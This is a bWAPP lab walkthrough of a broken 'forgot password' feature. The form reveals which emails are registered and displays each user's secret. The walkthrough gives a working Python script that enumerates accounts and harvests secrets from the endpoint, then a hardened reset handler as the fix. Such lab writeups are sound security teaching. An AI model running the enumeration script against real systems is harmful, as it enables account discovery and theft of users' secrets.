In this walkthrough we go through the Broken Authentication (Forgotten Password) section of the bWAPP labs. We will explore and exploit the "forgot password" functionality and see how applications are affected when it is implemented badly. So let's get started with the hacking without any delay.
Table of Contents
- Setting the security level to Low.
- The application has a “Forgot secret” functionality, used to retrieve a user’s secret in case he has forgotten it. The functionality asks for the user’s email and shows the secret in return. The form issues a POST request to ba_forgotten.php, which displays the secret.
- I entered a random email and got an “Invalid user!” error. That means the application checks whether the email belongs to a registered user and tells us the result, so the form can be used to enumerate valid accounts.
- I entered the email of the user bee and got the secret.
- We can exploit this functionality if we know nothing more than the target user’s email. For the proof of concept, I created a fake user named “Kratos”.
- When I entered the email address of my target user, I got his secret.
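The steps above can be scripted. The following is an added example written for this writeup, not code from bWAPP: it sends the same POST the form sends and classifies the response, so a list of candidate addresses can be checked for registered accounts and their leaked secrets. Assumptions (not confirmed by the page): the form field is called `email`, the Low level is selected with a `security_level=0` cookie, and the secret is rendered after the text "secret:". Only the “Invalid user!” marker comes from the page itself. Copy the exact field names and cookies from an intercepted request before running it against a real instance; the `post` callable is injected so the logic can be exercised offline against a constructed stand-in server.

```python
"""Enumerating registered accounts through bWAPP's 'Forgot secret' form.

Added example, not bWAPP's own code. Known from the page: an unregistered
address yields 'Invalid user!' and a registered one yields the secret.
Assumed: the POST field is 'email', the Low level is cookie
'security_level=0', and the secret is printed after 'secret:'.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional

INVALID_MARKER = "Invalid user!"  # confirmed by the walkthrough
# Assumed display format; only used to extract the secret, not to classify.
SECRET_RE = re.compile(r"secret:\s*(.+?)\s*(?:<|$)", re.IGNORECASE)


def classify(body: str) -> Optional[str]:
    """Return the leaked secret for a registered address, None otherwise.

    Classification relies solely on the 'Invalid user!' marker, so it still
    enumerates accounts even if the secret format differs from the assumption.
    """
    if INVALID_MARKER in body:
        return None
    match = SECRET_RE.search(body)
    return match.group(1) if match else "<secret not parsed>"


def post_email(base_url: str, email: str,
               cookies: str = "security_level=0",
               extra_fields: Optional[Dict[str, str]] = None) -> str:
    """Send the POST that the form sends to ba_forgotten.php.

    extra_fields lets you add a submit-button field if the intercepted
    request carries one (field names are an assumption, see module doc).
    """
    fields = {"email": email}
    fields.update(extra_fields or {})
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/ba_forgotten.php",
                                 data=data)
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookies:
        req.add_header("Cookie", cookies)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def enumerate_accounts(candidates: Iterable[str],
                       post: Callable[[str], str]) -> Dict[str, str]:
    """Try every candidate; return {email: secret} for confirmed accounts."""
    found: Dict[str, str] = {}
    for email in candidates:
        secret = classify(post(email))
        if secret is not None:
            found[email] = secret
    return found


def fake_server(email: str) -> str:
    """Constructed stand-in for ba_forgotten.php at the Low level."""
    users = {"bee@example.com": "A very secret phrase"}  # constructed data
    if email in users:
        return f"<p>Your secret: {users[email]}</p>"
    return "<p>Invalid user!</p>"


if __name__ == "__main__":
    # Offline demo; against a live lab pass
    # lambda e: post_email("http://localhost/bWAPP", e) instead of fake_server.
    print(enumerate_accounts(["nobody@example.com", "bee@example.com"],
                             fake_server))
```

The user-enumeration part is what makes the Low level dangerous even before the secret leaks: an attacker with a list of corporate email addresses learns which ones have accounts, which feeds credential stuffing and phishing.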
So, we have completed the bWAPP Broken Authentication (Forgotten Password) vulnerability. We looked at how the application’s forgot-secret functionality is set up and how its security control can be bypassed. The attack works because the application both confirms whether an email is registered and returns the secret directly in the response. To mitigate it, the forgot-password functionality should return the same generic message whether or not the address exists, should never display the secret, and should instead send a single-use, time-limited password reset token to the registered user’s email address. On that note, I will take my leave and will meet you in the next one with another bWAPP vulnerability writeup; till then, “Keep Hacking”.
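To make the mitigation concrete, here is an added example of a hardened forgot-secret handler. It is illustrative code written for this writeup, not bWAPP’s own fix and not a framework API: the handler returns one generic message regardless of whether the address exists, generates a token even for unknown addresses so the two paths take similar time, stores only a hash of the token, and makes the token single-use and time-limited. The user table and the `outbox` list are constructed stand-ins for a database and a mail sender; `now` is injectable so expiry can be tested offline.

```python
"""Hardened 'forgot secret' handler.

Added example, not bWAPP code. Shows the mitigation described above:
generic response, no secret in the response, single-use time-limited token.
"""
import hashlib
import secrets
import time
from typing import Callable, Dict, List, Optional, Tuple

TOKEN_TTL_SECONDS = 15 * 60
GENERIC_MESSAGE = "If that address is registered, a reset link has been sent."


class ResetService:
    def __init__(self, users: Dict[str, str],
                 now: Callable[[], float] = time.time) -> None:
        self.users = users                      # email -> secret (constructed)
        self.now = now
        # sha256(token) -> (email, expiry). Storing the hash means a leaked
        # table does not hand out usable tokens.
        self.tokens: Dict[str, Tuple[str, float]] = {}
        self.outbox: List[Tuple[str, str]] = []  # stands in for sending mail

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def request_reset(self, email: str) -> str:
        """Same message and roughly the same work whether or not email exists."""
        token = secrets.token_urlsafe(32)       # generated on both paths
        digest = self._digest(token)
        if email in self.users:
            self.tokens[digest] = (email, self.now() + TOKEN_TTL_SECONDS)
            self.outbox.append((email, token))  # only the owner receives it
        return GENERIC_MESSAGE

    def redeem(self, token: str, new_secret: str) -> bool:
        """Consume the token; reject unknown, reused or expired tokens."""
        entry: Optional[Tuple[str, float]] = self.tokens.pop(self._digest(token), None)
        if entry is None:
            return False
        email, expiry = entry
        if self.now() > expiry:
            return False
        self.users[email] = new_secret
        return True


def run_demo() -> Dict[str, object]:
    """Exercise the handler against constructed data; returns the outcomes."""
    clock = [1_000_000.0]
    svc = ResetService({"bee@example.com": "old secret"}, now=lambda: clock[0])
    out: Dict[str, object] = {}
    out["unknown_msg"] = svc.request_reset("nobody@example.com")
    out["mails_after_unknown"] = len(svc.outbox)
    out["known_msg"] = svc.request_reset("bee@example.com")
    _, token = svc.outbox[0]
    out["bad_token"] = svc.redeem("not-a-real-token", "x")
    out["first_use"] = svc.redeem(token, "new secret")
    out["secret_now"] = svc.users["bee@example.com"]
    out["reuse"] = svc.redeem(token, "again")
    svc.request_reset("bee@example.com")        # fresh token, then let it age
    _, stale = svc.outbox[1]
    clock[0] += TOKEN_TTL_SECONDS + 1
    out["expired"] = svc.redeem(stale, "late")
    return out


if __name__ == "__main__":
    print(run_demo())
```

Two details are easy to get wrong in practice: comparing or storing the raw token (hash it, as above), and returning early for unknown addresses, which turns the generic message into a timing oracle. Rate limiting on the endpoint is still needed on top of this; it is outside what the snippet shows.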